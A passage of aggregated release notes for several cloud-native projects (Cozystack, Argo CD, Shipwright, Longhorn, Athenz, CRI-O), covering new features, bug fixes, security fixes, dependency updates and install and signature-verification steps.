The integration builds on the existing SchedulingClass tenant workload placement system introduced in v1.2.0 and requires no tenant-side configuration — workloads simply benefit once a SchedulingClass is assigned. Administrators can mix storage locality with the existing data-center / hardware-generation constraints defined on SchedulingClass CRs (@lllamnyp in #2330).

LINSTOR GUI: Managed Web Console for Storage Administration

A new opt-in linstor-gui system package deploys LINBIT's linstor-gui web UI alongside the LINSTOR controller with mTLS client authentication, non-root security context, and a ClusterIP-only service by default. When OIDC is configured on the platform, an optional Keycloak-protected Ingress (via oauth2-proxy) exposes the UI for browser access. Access is restricted to members of the cozystack-cluster-admin Keycloak group, consistent with host-cluster admin RBAC, and the gatekeeper blocks in-app LINSTOR authentication setup at the nginx proxy layer so the managed configuration cannot be subverted through the UI.

Operators who prefer CLI access keep the existing linstor command; the GUI is strictly additive and stays disabled by default (@myasnikovdaniil in #2382, #2390, #2415, #2419).

VM Default Images: Out-of-the-Box VM Provisioning

The new vm-default-images package provides a curated set of cluster-wide virtual-machine images (Ubuntu, Debian, CentOS Stream, and others) as pre-populated DataVolumes, so tenants can provision VMs against well-known base images without first having to upload them. The package is opt-in via the iaas bundle and defaults to replicated storage for high availability. Migration 38 renames legacy vm-image-* DataVolumes to the new vm-default-images-* naming scheme, and the vm-disk chart gains a new "disk" source type for cloning from existing vm-disks in the same namespace (@myasnikovdaniil in #2258).

Application Observability: WorkloadsReady, Events, and S3 Bucket Metering

Applications now expose a WorkloadsReady condition on their status by querying associated WorkloadMonitor resources, giving operators a single place to check whether all underlying workloads (Deployments, StatefulSets, DaemonSets, PVCs) are healthy. The dashboard gains a new Events tab showing namespace-scoped Kubernetes events per application, with fallback to .firstTimestamp when .eventTime is absent. A long-standing bug where WorkloadMonitor's Operational status was never persisted is fixed in the same change (@lexfrei in #2356).

The WorkloadMonitor reconciler is extended to track COSI BucketClaim objects as first-class Workloads, and the bucket controller now queries SeaweedFS logical and physical bucket-size metrics from VictoriaMetrics via a namespace-scoped monitoring endpoint, enabling S3 billing integration on par with Pods and PVCs (@kitsunoff in #2391). Workloads are also enriched with workloads.cozystack.io/resource-preset and source-object labels so downstream billing pipelines can correlate monitors with the tenant preset that produced them (@androndo in #2416).

Cross-Namespace VM Backup Restore and RestoreJob Dashboard

The backup system now supports restoring VMInstance backups into a different namespace (cross-namespace copy restores) with IP/MAC preservation and safe rename semantics. In-place backup and restore flows for VMDisk and VMInstance are improved: HelmReleases and DataVolumes are properly handled, and Velero failure messages are propagated to the Application status. The backup status structure has been refactored to store underlying resources as a generic opaque JSON object, enabling arbitrary application-specific metadata without status-schema churn (@androndo in #2251, #2319, #2329).

The dashboard now ships a complete RestoreJob experience: list view, details page, create form, and sidebar entry, with a "Same as backup" fallback rendering when spec.targetApplicationRef is omitted. Non-CRD-backed sidebar factories (kube-*, plan, backupjob, backup, restorejob) are marked static so they pick up consistent managed-by labels across reconciles (@myasnikovdaniil in #2437).

Major Features and Improvements

  • [api] Reject tenant names with dashes at Create time: Enforces alphanumeric-only naming for Tenants at the API level, preventing names with hyphens that would silently fail during Helm reconciliation. A corresponding regex tightening and regression test suite hardens the validation (@lexfrei in #2380).

  • [platform] Validate computed tenant namespace length: Rejects Tenant creation when the computed ancestor-chain namespace would exceed the 63-character Kubernetes namespace limit, preventing opaque HelmRelease reconcile errors downstream (@lexfrei in #2376).

  • [vm-instance] Rename subnets to networks and add dropdown selector: Renames the misleading subnets field to networks in VMInstance for clarity, adds a dropdown selector for available networks in the dashboard form, and includes migration 36 to copy existing subnets values. The old field remains supported for backward compatibility (@sircthulhu in #2263).

  • [keycloak] Enable injecting themes: Cozystack administrators can now inject custom Keycloak themes via initContainers for UI white-labeling and customization (@lllamnyp in #2142).

  • [keycloak-configure] Add email verification and SMTP configuration: Adds configurable Keycloak settings for user self-registration, email verification, and SMTP server configuration, enabling automated user onboarding flows (@BROngineer in #2318).

  • [postgres] Pin system PostgreSQL to 17.7-standard-trixie: Pins the PostgreSQL image for system databases (Grafana, Alerta, Harbor, Keycloak, SeaweedFS) to 17.7-standard-trixie across chart templates and values.yaml, and ships migration 37 to patch existing CNPG Cluster imageName fields to the same variant (handling unset, any PG 17 tag, and bare-version tags). This prevents CNPG from defaulting to PostgreSQL 18 and locks system databases to the trixie variant consistent with the monitoring stack requirements (related backports shipped in v1.2.1 via #2309 and v1.2.2 via #2364) (@myasnikovdaniil in #2369).

  • [platform] Prevent installed packages deletion: Adds the helm.sh/resource-policy: keep annotation to platform packages so disabling a package no longer triggers automatic Helm deletion, restoring the documented behavior where operators must explicitly delete a package (backported to v1.2.1) (@kvaps in #2273).

  • [mariadb] Always enable replication for consistent service naming: MariaDB now always enables replication, creating -primary/-secondary services even for single-replica instances. This fixes dashboard visibility and backup functionality for single-replica setups (@sircthulhu in #2279).

  • [hack] Add host runtime preflight check: New check-host-runtime.sh script and make preflight target that warns operators when a standalone containerd or docker runtime is running alongside the embedded k3s runtime, helping diagnose container-runtime conflicts early in an installation (@lexfrei in #2371).

  • [hack] Add check-readiness.sh diagnostic script: A new diagnostic script for tracking platform reconciliation by checking readiness of Packages, ArtifactGenerators, ExternalArtifacts, and HelmReleases, with support for watch mode and continuous monitoring (@myasnikovdaniil in #2294).

  • [platform] Add resourcePreset labels to WorkloadMonitor labels: WorkloadMonitor labels with the workloads.cozystack.io/ prefix are now propagated onto created Workloads; created Workloads always include the reserved workloads.cozystack.io/monitor label, and Helm app charts add workloads.cozystack.io/resource-preset metadata to WorkloadMonitor manifests, enabling downstream billing pipelines to correlate monitors with the tenant preset that produced them (@androndo in #2416).

Bug Fixes

  • [platform] Migrate ACME HTTP-01 to ingressClassName API: Switches ACME HTTP-01 issuance from the deprecated acme.cert-manager.io/http01-ingress-class annotation to the modern ingressClassName field on ClusterIssuer and solver pods. Previously, ClusterIssuers referenced a non-existent nginx class while each Ingress individually overrode it via annotation — producing ingressClassName and class cannot be set at the same time errors when tenants attempted to migrate to the modern field. The migration is atomic: both the ClusterIssuer and consuming Ingresses are updated together (backported to v1.2.4) (@myasnikovdaniil in #2436).

  • [harbor] Remove incorrect tenant module flags: Harbor is a PaaS service, not a tenant module. Incorrect spec.dashboard.module: true and internal.cozystack.io/tenantmodule flags caused Harbor to appear in the sidebar "Modules" section and be misclassified by controllers handling tenant modules. The flags are now removed so Harbor is displayed in its proper PaaS category and is no longer treated as a tenant-scoped HelmRelease (@kvaps in #2444).

  • [kube-ovn] Resolve kubeovn-plunger RBAC forbidden on deployments: Grants kube-ovn-plunger the RBAC needed to list Deployments so it can reconcile ovn-central, fixing deployments.apps is forbidden errors in cozy-kubeovn (@kvaps in #2441).

  • [cilium] Opt-out of cri-containerd.apparmor.d for nsenter init containers: Opts cilium-agent init containers out of the cri-containerd.apparmor.d AppArmor profile on non-Talos variants (cilium-generic, kubeovn-cilium-generic), fixing Init:CrashLoopBackOff on Ubuntu 22.04+ and Debian where the profile denies nsenter namespace entry. Talos variants are untouched as Talos does not load the AppArmor LSM (backported to v1.2.2) (@lexfrei in #2370).

  • [virtual-machine] Exclude external VM services from Cilium BPF LB: Adds the service.kubernetes.io/service-proxy-name: cozy-proxy label to VM LoadBalancer services with external: true, telling Cilium to skip BPF processing entirely. Fixes inter-tenant connectivity via public LB IPs (Cilium's DNAT caused cross-tenant pod-to-pod flow classification, triggering CiliumClusterwideNetworkPolicy blocks) and restores WholeIP behavior on Cilium 1.19+ where wildcard service drop entries previously blocked traffic to LB IPs on undeclared ports (backported to v1.2.2) (@mattia-eleuteri in #2357).

  • [monitoring] Fix infra dashboards missing in default variant: Includes the cozy-monitoring namespace in the dashboard rendering condition, fixing infrastructure Grafana dashboards not rendering in the default platform variant (only the tenant-root namespace was previously checked) (backported to v1.2.2) (@mattia-eleuteri in #2365).

  • [build] Filter git describe to match only v tags*: Adds --match 'v*' to all git describe calls in hack/common-envs.mk, preventing the api/apps/v1alpha1/vX.Y.Z subtag from being picked up instead of the release tag and producing invalid Docker image tags (backported to v1.2.2) (@kvaps in #2386).

  • [platform] Fix resource allocation ratios not propagated to packages: Restores propagation of cpuAllocationRatio, memoryAllocationRatio, and ephemeralStorageAllocationRatio from platform/values.yaml to the cozystack-values Secret that managed applications and KubeVirt read, fixing a regression introduced in the bundle restructure that silently ignored operator-configured ratios (backported to v1.2.1) (@sircthulhu in #2296).

  • [kubernetes] Set explicit ephemeral-storage on virt-launcher pods: Sets explicit domain.resources ephemeral-storage on the VirtualMachine spec to prevent virt-launcher pods from being evicted because LimitRange defaults were too small for the actual emptyDisk capacity (backported to v1.2.3) (@kvaps in #2317).

  • [multus] Pin master CNI to 05-cilium.conflist: Prevents a boot-time race where multus could auto-detect kube-ovn's conflist instead of Cilium's, which would cause pods to bypass the Cilium chain entirely and lose their endpoint (backported to v1.2.1) (@kvaps in #2315).

  • [multus] Build custom image with DEL cache fix: Fixes sandbox cleanup deadlock when CNI ADD never completes, preventing stale sandbox name reservations from permanently blocking pod creation after a node disruption (backported to v1.2.1) (@kvaps in #2313).

  • [linstor] Set verify-alg to crc32c: Prevents DRBD connection failures on kernels where crct10dif is unavailable (e.g., Talos v1.12.6 with kernel 6.18.18) by setting the LINSTOR verify-alg controller default to crc32c (backported to v1.2.1) (@kvaps in #2303).

  • [linstor] Preserve TCP ports during toggle-disk operations: Saves existing TCP ports into the LayerPayload before removeLayerData() deletes them, preventing DRBD resources from entering StandAlone state when a satellite misses the resulting update (backported to v1.2.1) (@kvaps in #2292).

  • [linstor] Increase satellite startup probe failure threshold: Raises the LINSTOR satellite startupProbe failureThreshold from 3 to 30 (30s → 300s) in the LinstorSatelliteConfiguration pod template, giving satellites with slow storage initialization enough time to come up without being killed and restarted (@Arsolitt in #2425).

Security

  • docs: add SECURITY.md: Adds vulnerability reporting procedures, disclosure expectations, and supported release lines (@kvaps in #2230).

  • docs: add OpenSSF Best Practices badge to README: Adds the OpenSSF Best Practices passing badge to the project README (@lexfrei in #2320).

Dependencies & Version Updates

  • [kube-ovn] Bump kube-ovn to v1.15.10 with port-group regression fix: Updates packages/system/kubeovn to upstream v1.15.10 (from v1.15.3) and carries a patch for pkg/controller/pod.go that preserves a VM LSP's port-group memberships when Kubernetes GCs a completed virt-launcher pod while another virt-launcher pod of the same VM is still running. Without the patch, the destination pod of a successful live migration lost its security groups, network policies, and node-scoped routing until kube-ovn-controller was restarted (@kvaps in #2443).

  • [monitoring] Upgrade victoria-metrics-operator to v0.68.4: Bumps the vendored victoria-metrics-operator Helm chart from 0.59.1 to 0.61.0 (operator appVersion v0.68.1 → v0.68.4), picking up upstream fixes for VMPodScrape port routing on VMAgent/VLAgent and StatefulSet pod deletion (not eviction) when maxUnavailable=100% (@lexfrei in #2426).

  • [linstor] Update piraeus-server to v1.33.2 with selected backports: Bumps LINSTOR server from v1.33.1 to v1.33.2 with backported patches for stale bitmap adjust retry, LUKS2 header sizing, optimal I/O size detection, and the maintainer implementation. All patches verified against upstream v1.33.2 with git apply --check and gradlew compileJava (backported to v1.2.2) (@kvaps in #2331).

  • [kamaji] Update to 26.3.5-edge, drop upstreamed patches: Updates Kamaji from edge-26.2.4 to 26.3.5-edge and removes two patches accepted upstream. Adds configurable probe tuning and DataStore readiness conditions (@myasnikovdaniil in #2260).

  • [talm] Release v0.23.0, v0.23.1, v0.24.0 (github.com/cozystack/talm): Migrates to the Talos v1.12 multi-document machine config format (@lexfrei in cozystack/talm#116); renders templates online in apply to resolve lookups (@myasnikovdaniil in cozystack/talm#119); bumps dependencies and modernizes the codebase (@lexfrei in cozystack/talm#124).

  • [ansible-cozystack] Release v1.2.1, v1.2.2, v1.2.4 (github.com/cozystack/ansible-cozystack): Exposes publishing.externalIPs and tenant-root ingress via role variables (@lexfrei in cozystack/ansible-cozystack#30); adds a comprehensive node prerequisites audit (@lexfrei in cozystack/ansible-cozystack#27); replaces ansible.utils.ipaddr with a stdlib-based test plugin (@lexfrei in cozystack/ansible-cozystack#24); adds v prefix to collection version in requirements.yml examples (@lexfrei in cozystack/ansible-cozystack#23); tracks installer releases v1.2.1 through v1.2.4 (@app/renovate in cozystack/ansible-cozystack#20, #22, #29, #31, #32).

Development, Testing, and CI/CD

  • [ci] Replace cozystack-bot PAT with cozystack-ci GitHub App: Replaces the long-lived cozystack-bot personal access token with short-lived, scoped tokens from the cozystack-ci GitHub App across all release workflows (tags.yaml, auto-release.yaml, pull-requests-release.yaml), improving security and auditability of CI operations (@tym83 in #2351; @kvaps in #2383, #2392).

  • [ci] Add Gemini Code Assist and CodeRabbit configuration: Adds repository-level configuration for AI code reviewers with ignore patterns for vendored/generated code and incremental review settings (@lexfrei in #2385).

  • [ci] Promote next/ trunk on new minor/major releases: Updates update-website-docs in tags.yaml to match the new docs-versioning contract — the website repo replaces the old "pre-create vX.Y/ draft directory" scheme with a permanent content/en/docs/next/ trunk, and released version directories are promoted explicitly by the release workflow (@myasnikovdaniil in #2433).

  • [tests] Fix Kafka E2E test timeout and retry race condition: Increases Kafka E2E test timeout from 60s to 300s and fixes a retry race where kubectl apply could hit a still-deleting resource (@lexfrei in #2358).

  • docs: adopt Conventional Commits for commit and PR titles: Standardizes commit and PR title format to type(scope): description across all contributing docs and the PR template (@lexfrei in #2395).

  • docs(ci): require screenshots for UI changes in PR template: Adds a mandatory screenshots section to the PR template for UI-related changes (@kitsunoff in #2407).

  • chore(maintenance): add @myasnikovdaniil to CODEOWNERS: Adds @myasnikovdaniil to the default owners in .github/CODEOWNERS for automatic review requests (@myasnikovdaniil in #2434).

Documentation

  • [website] Add ApplicationDefinition naming convention reference: Documents how cozystack-api resolves kinds to their backing definitions (@lexfrei in cozystack/website#478).

  • [website] Document Talos / talosctl / Cozystack version pairing: Adds a version compatibility matrix for installation (@lexfrei in cozystack/website#484).

  • [website] Document namespace layout and parent/child derivation: Explains tenant namespace hierarchy and parent/child namespace derivation rules (@lexfrei in cozystack/website#479).

  • [website] Document the checkbox-then-edit-CR customization pattern for tenants: Describes the workflow for customizing tenant settings via the CR after initial checkbox-based creation (@lexfrei in cozystack/website#485).

  • [website] Add custom Keycloak themes documentation: Covers the theme image contract, configuration, imagePullSecrets, and theme activation in the Keycloak admin console (@lexfrei in cozystack/website#463).

  • [website] Add bonding (LACP) configuration how-to guide: Covers network bonding configuration for Cozystack installations (@sircthulhu in cozystack/website#459).

  • [website] Improve registry mirrors for tenant Kubernetes in air-gapped guide: Improves documentation for configuring registry mirrors in air-gapped environments (@sircthulhu in cozystack/website#461).

  • [website] Rewrite guide for ApplicationDefinition API (external-apps): Comprehensive rewrite of the external apps guide using the ApplicationDefinition API with Minecraft server examples (@kitsunoff in cozystack/website#488).

  • [website] Add documentation for Go types usage: Guide for using generated Go types for Cozystack managed applications as a Go module (@myasnikovdaniil in cozystack/website#465).

  • [website] Update backup/restore documentation for VMI/VMDisk: Updates backup documentation with VM instance and VM disk restore improvements (@androndo in cozystack/website#466).

  • [website] Refactor docs versions to major.minor variants: Moves docs to major.minor versioning for the v1.x series (@myasnikovdaniil in cozystack/website#477).

  • [website] Trunk-based versioning with permanent next/ directory: Replaces the old "pre-create vX.Y/ draft directory" scheme with a permanent content/en/docs/next/ trunk; released version directories are promoted explicitly by hack/release_next.sh on new minor/major releases, and routing between next/ and vX.Y/ is Makefile-driven (@myasnikovdaniil in cozystack/website#495).

  • [website] Add updated OpenAPI spec: Updates the OpenAPI specification for managed applications reference (@myasnikovdaniil in cozystack/website#469).

  • [website] Add OpenAPI spec download to GitHub Pages build: Fixes the GitHub Pages build to include the OpenAPI spec download (@myasnikovdaniil in cozystack/website#494).

  • [website] Add OSS Health pages and OpenSSF badge: Adds OSS Health section with OpenSSF Scorecard and Best Practices badges to the website (@tym83 in cozystack/website#470).

  • [website] Add Telemetry page under OSS Health section: Adds the Telemetry page with initial data seeding to the OSS Health docs (@tym83 in cozystack/website#471, cozystack/website#504).

  • [website] Blog: OSS Health section launch announcement: Publishes the announcement blog post for the OSS Health section (@tym83 in cozystack/website#474).

  • [website] Fix OpenSSF canonical status URL: Changes the OpenSSF canonical status URL from pt-BR to en (@tym83 in cozystack/website#475).

  • [website] Add CozySummit Virtual 2026 program announcement: Publishes the CozySummit Virtual 2026 program announcement blog post (@tym83 in cozystack/website#472).

  • [website] Add missing release announcements for v0.1–v0.41: Backfills missing release announcement blog posts for historical Cozystack versions (@tym83 in cozystack/website#468).

  • [website] Blog: managed PostgreSQL with synchronous replication: Adds a post covering the managed PostgreSQL synchronous-replication feature (@tym83 in cozystack/website#497).

  • [website] Blog taxonomies and client-side filter UI: Registers article-type and topic taxonomies and adds a client-side filter on the blog list page (@tym83 in cozystack/website#499).

  • [website] Add images frontmatter for social preview on existing posts: Adds images frontmatter for social preview on existing blog posts (@tym83 in cozystack/website#498).

  • [website] Fix broken links and stale anchors across v1 docs: Fixes 14 broken links and stale talm anchors (@lexfrei in cozystack/website#486).

  • [website] Prefix bundle package names with cozystack. in v1 examples: Corrects package naming in documentation examples (@lexfrei in cozystack/website#482).

  • [website] Finish isolated-field removal and document opt-in policy labels: Removes the obsolete isolated field from tenant documentation and documents the new opt-in policy labels approach (@lexfrei in cozystack/website#481).

  • [website] Add --take-ownership flag and describe networking. fields*: Documents the --take-ownership flag and networking.* fields in the installation guide (@lexfrei in cozystack/website#480).

  • [website] Fix KubeOVN MASTER_NODES example path and key in troubleshooting: Corrects the MASTER_NODES example path and key (@lexfrei in cozystack/website#483).

  • [website] Add CLAUDE.md for AI agent guidance: Adds a CLAUDE.md file describing the trunk-based docs architecture for AI agent guidance (@myasnikovdaniil in cozystack/website#489).

  • [website] Update /docs/v1/ redirect to latest v1.2: Updates the /docs/v1/ redirect target to point to the latest v1.2 docs on GitHub Pages (@myasnikovdaniil in cozystack/website#492).

  • [website] Remove nbykov from CODEOWNERS and CLAUDE.md: Cleans up CODEOWNERS and CLAUDE.md entries (@myasnikovdaniil in cozystack/website#491).

  • [website] Add Ahrefs Analytics tracker: Adds the Ahrefs Analytics tracker to the website (@tym83 in cozystack/website#503).

  • [website] Add breathing room between navbar and hero on OSS Health: Minor styling fix for the OSS Health section (@tym83 in cozystack/website#500).

  • [website] Fix og social badge image and title: Updates the social badge image and title (@tym83 in cozystack/website#487).

  • [website] Update managed apps reference for v1.2.1: Automated managed-apps reference update (@cozystack-bot in cozystack/website#464).

  • [external-apps-example] Replace MongoDB example with Minecraft apps: Refactors the external apps example to use the ApplicationDefinition API with Minecraft server applications (@lexfrei in cozystack/external-apps-example#2).

  • docs: update README introductory description: Refines the platform positioning and improves clarity on core capabilities in the main README (@tym83 in #2409).

Governance

Contributors

We'd like to thank all contributors who made this release possible:

New Contributors

We're excited to welcome our first-time contributors:

Full Changelog: v1.2.0...v1.3.0

Download cozystack

Cozystack sandbox

Cozystack is a free PaaS platform and framework for building private clouds and providing users/customers with managed Kubernetes, KubeVirt-based VMs, databases as a service, NATS, message brokers, etc. with GPU support in VMs and Kubernetes clusters.

v1.2.3

v1.2.3 (2026-04-20)

A patch release with bug fixes and documentation updates.

Features and Improvements

No notable features in this patch release.

Fixes

  • fix(kubernetes): set explicit ephemeral-storage on virt-launcher pods: Prevents VM crashes caused by ephemeral-storage eviction by setting explicit domain.resources ephemeral-storage on the VirtualMachine spec. Uses sanitized limits and requests so virt-launcher pods do not inherit too-small namespace defaults. (@kvaps in #2317, backport #2423).

Documentation

Other repositories

Contributors

Thanks to everyone who contributed to this patch release:

Full Changelog: v1.2.2...v1.2.3

Download cozystack

Cozystack sandbox

Cozystack is a free PaaS platform and framework for building private clouds and providing users/customers with managed Kubernetes, KubeVirt-based VMs, databases as a service, NATS, message brokers, etc. with GPU support in VMs and Kubernetes clusters.

v1.3.1

v1.3.1 (2026-04-28)

Patch release covering a TenantNamespace IDOR fix in the API, a destructive post-upgrade hook removed from the etcd chart, kamaji controller stability, a linstor-csi bump that fixes live migration on Protocol-A/B DRBD resources, the missing linstor-gui build wiring, and a velero RBAC fix that unblocked installs on bundles without Velero.

Security

  • fix(api): prevent IDOR in TenantNamespace Get and Watch handlers: Two IDOR (Insecure Direct Object Reference) vulnerabilities allowed authenticated users to read TenantNamespace metadata they had no RoleBinding for. The Get and Watch handlers now go through a new hasAccessToNamespace() helper that lists RoleBindings scoped only to the target namespace (orders of magnitude faster than the previous all-cluster scan), returns NotFound instead of leaking existence on unauthorized access, and applies the same check on the Watch filter path. Includes regression tests for the unauthorized paths. (@IvanHunters in #2471, backport #2524)

Features

  • feat(linstor): bump linstor-csi to v1.10.6 with Protocol-C dual-attach fix: Live migration of KubeVirt VMs on Protocol-A/B (async) DRBD volumes no longer fails with Protocol C required. linstor-csi v1.10.6 now installs a Protocol=C override on the resource-definition during dual-attach and reverts it on detach, so replicated-async StorageClasses and other Protocol-A/B resource groups support live migration without manual drbdadm adjust intervention. (@kvaps in #2496, backport #2505)

Fixes

  • fix(backups): move velero-configmap Role to velero chart: The backupstrategy-controller (a default package) declared a Role/RoleBinding scoped to the cozy-velero namespace for managing ResourceModifier ConfigMaps. On bundles where Velero was not enabled, that namespace did not exist and the HelmRelease failed with namespaces "cozy-velero" not found, blocking installation. The Role/RoleBinding now lives in the velero chart, so it is created only when velero is actually deployed. (@myasnikovdaniil in #2459, backport #2467)

  • fix(etcd): remove destructive post-upgrade cert-regeneration hook: The etcd chart ran a post-upgrade Helm hook on every upgrade that deleted etcd TLS Secrets (etcd-ca-tls, etcd-peer-ca-tls, etcd-client-tls, etcd-peer-tls, etcd-server-tls) and then deleted etcd pods, forcing cert-manager to re-issue the entire etcd CA chain. On clusters with Kamaji-managed tenant control planes this put every tenant kube-apiserver into CrashLoopBackOff until each DataStore was manually re-reconciled. The hook was a one-shot 2.6.0 → 2.6.1 migration that became a permanent footgun once chart versioning moved to 0.0.0+<git-hash> (always < 2.6.1 per semver) and after the underlying rotationPolicy: Always issue was fixed in 47d81f70. The hook is now removed entirely. (@myasnikovdaniil in #2462, backport #2511)

  • fix(kamaji): increase memory limits and add startup probe: The kamaji controller frequently entered CrashLoopBackOff due to OOMKills (exit 137) within ~20–25 seconds of startup, with the readiness probe failing while the controller was still finishing initialization. Memory limit raised from 500Mi to 512Mi, request from 100Mi to 256Mi, and a 60-second startup probe (12 attempts × 5s periods) is added so the controller has room to boot before liveness/readiness probes engage. (@IvanHunters in #2421, backport #2491)

Build

  • build(linstor): include linstor-gui in root image build target: The linstor-gui package (added in #2382) was never wired into the root Makefile's build: target, so CI never built or published the image. ghcr.io/cozystack/cozystack/linstor-gui returned NAME_UNKNOWN and values.yaml stayed pinned to tag: 2.3.0 without a digest. The missing build line is added so the next CI run publishes the image and the per-package Makefile digest-pins values.yaml automatically. (@myasnikovdaniil in #2498, backport #2518)

Contributors

Thanks to everyone who contributed to this patch release:

Full Changelog: v1.3.0...v1.3.1

Download cozystack

Argo graduated

Kubernetes-native tools to run workflows, manage clusters, and do GitOps right.

v3.1.16

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.16/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.16/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

  • af7a36e: fix(server): Avoid error when attempting a second delete operation (cherry-pick #27495 for 3.1) (#27502) (@argo-cd-cherry-pick-bot[bot])

Dependency updates

  • c4499a3: chore(deps): bump SonarSource/sonarqube-scan-action from 5.2.0 to 8.0.0 (cherry-pick 27602 to 3.1) (#27607) (@dudinea)

Full Changelog: v3.1.15...v3.1.16

Shipwright sandbox

Shipwright Build release v0.19.3

Release changes since v0.19.2

To see a list of addressed vulnerabilities, please refer to #2141

Features

Fixes

API Changes

Docs

Misc

#2162 by @SaschaSchwarze0: Update github.com/tektoncd/pipeline from v1.9.1 to v1.9.2, update google.golang.org/grpc from v1.77.0 to v1.79.3, update github.com/go-git/go-git/v5 from v5.17.0 to v5.17.1

Longhorn incubating

Cloud-native distributed storage for Kubernetes

Longhorn v1.11.2

Longhorn v1.11.2 Release Notes

Longhorn 1.11.2 introduces several improvements and bug fixes that are intended to improve system quality, resilience, stability and security.

We welcome feedback and contributions to help continuously improve Longhorn.

For terminology and context on Longhorn releases, see Releases.

Important Fixes

This release includes several critical stability fixes.

Replica rebuild progress fix

Resolved an issue where replica rebuild progress could exceed 100% under unstable network conditions. Progress reporting is now capped at 100%.

For more details, see #12949.

CSIStorageCapacity scheduling enhancement

Introduced a new setting to control CSIStorageCapacity reporting. Previously, compute nodes without Longhorn disks incorrectly reported 0 capacity, breaking WaitForFirstConsumer scheduling. With this enhancement, capacity tracking can be configured to avoid rejecting compute nodes in separated compute/storage architectures.

For more details, see #12807.

Improvement

Manager memory optimization

Optimized longhorn‑manager Pod informer caching to reduce cluster‑wide memory usage.

For more details, see #12771.

Installation

Important

Ensure that your cluster is running Kubernetes v1.25 or later before installing Longhorn v1.11.2.

You can install Longhorn using a variety of tools, including Rancher, Kubectl, and Helm. For more information about installation methods and requirements, see Quick Installation in the Longhorn documentation.

Upgrade

Important

Ensure that your cluster is running Kubernetes v1.25 or later before upgrading from Longhorn v1.10.x or v1.11.0 to v1.11.2.

Important

Users on v1.11.0 who experienced the memory leaks of longhorn-instance-manager pods 12575 are highly encouraged to upgrade to v1.11.1 or later to receive the permanent fix for the proxy connection leaks.

Longhorn only allows upgrades from supported versions. For more information about upgrade paths and procedures, see Upgrade in the Longhorn documentation.

Post-Release Known Issues

For information about issues identified after this release, see Release-Known-Issues.

Resolved Issues in this release

Improvement

  • [BACKPORT][v1.11.2][IMPROVEMENT] Reduce longhorn-manager memory usage by optimizing cluster-wide informer caching 12819 - @hookak @roger-ryao

Bug

  • [BACKPORT][v1.11.2][BUG] Test case test_storage_capacity_aware_pod_scheduling fails 13006 - @yangchiu @bachmanity1
  • [BACKPORT][v1.11.2][BUG] Replica Auto-Balance Causes Infinite Replica Scheduling Loop 12928 - @yangchiu @shuo-wu
  • [BACKPORT][v1.11.2][BUG] CSIStorageCapacity reports 0 for compute nodes without Longhorn disks, breaking WaitForFirstConsumer scheduling 12918 - @chriscchien @bachmanity1
  • [BACKPORT][v1.11.2][BUG] Replica rebuild progress can go over 100% 12952 - @yangchiu @davidcheng0922
  • [BACKPORT][v1.11.2][BUG] Node exhaustion caused by backup inspect buildup induced due to NFS latency 12945 - @COLDTURNIP @roger-ryao
  • [BACKPORT][v1.11.2][BUG] Failed to collect health data for block disk (AIO) when disk path is a /dev/disk/by-id symlink 12911 - @yangchiu @hookak
  • [BACKPORT][v1.11.2][BUG] "snapshot becomes not ready to use" Warning events emitted during expected auto-cleanup after backup 12856 - @EpochBoy @yangchiu

Stability

Contributors

Athenz sandbox

Open source platform for X.509 certificate based service authentication and fine grained access control in dynamic infrastructures

Athenz v1.12.40 Release

What's Changed

  • [skip ci] Adding property description for athenz.zts.k8s_provider_gcp_attr_validator_factory_class by @psasidhar in #3322
  • disallow * member in roles if filters are configured by @havetisyan in #3327
  • extend user-cert support to allow timeout configuration based on role membership by @havetisyan in #3328
  • support role based configurable timeout for user id tokens by @havetisyan in #3331
  • [skip ci] update zts token documentation to document id token exchange requirements by @havetisyan in #3333
  • correct callback port to be int instead of string by @havetisyan in #3334
  • use of config.ClientTLSConfig for consistent tls config by @havetisyan in #3335
  • extend zts provider to read allowed members from a role by @havetisyan in #3332
  • add comments to clarify the use of cert issuer validator by @havetisyan in #3336
  • implement getRole method for roles provider in zts by @havetisyan in #3339
  • add single flight to ZTSClient token fetches by @t4niwa in #3330
  • update java/go/js dependencies to their latest releases by @havetisyan in #3341

New Contributors

Full Changelog: v1.12.39...v1.12.40

CRI-O graduated

CRI-O is a secure, performant, and stable Container Runtime Interface (CRI) implementation for the Kubelet to orchestrate Open Container Initiative (OCI) containers in production Kubernetes environments. CRI-O's scope is only targeted at Kubernetes, and thus can be performance optimized, rigorously tested and securely tuned for running containers, pods and images in Kubernetes clusters.

v1.35.3

CRI-O v1.35.3

The release notes have been generated for the commit range
v1.35.2...v1.35.3 on Tue, 05 May 2026 00:45:32 UTC.

Downloads

Download one of our static release bundles via our Google Cloud Bucket:

To verify the artifact signatures via cosign, run:

> export COSIGN_EXPERIMENTAL=1
> cosign verify-blob cri-o.amd64.v1.35.3.tar.gz \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.amd64.v1.35.3.tar.gz.bundle

To verify the bill of materials (SBOM) in SPDX format using the bom tool, run:

> tar xfz cri-o.amd64.v1.35.3.tar.gz
> bom validate -e cri-o.amd64.v1.35.3.tar.gz.spdx -d cri-o

Changelog since v1.35.2

Changes by Kind

Feature

  • CRI-O now continuously monitors CNI plugin health using the STATUS
    verb. If a plugin becomes unhealthy after initial readiness, the node
    is reported as NetworkReady=false, preventing pod scheduling on
    affected nodes. The node self-heals when the plugin recovers. (#9903, @haircommander)

Uncategorized

Dependencies

Added

Nothing has changed.

Changed

Removed

Nothing has changed.

CRI-O graduated

CRI-O is a secure, performant, and stable Container Runtime Interface (CRI) implementation for the Kubelet to orchestrate Open Container Initiative (OCI) containers in production Kubernetes environments. CRI-O's scope is only targeted at Kubernetes, and thus can be performance optimized, rigorously tested and securely tuned for running containers, pods and images in Kubernetes clusters.

v1.34.8

CRI-O v1.34.8

The release notes have been generated for the commit range
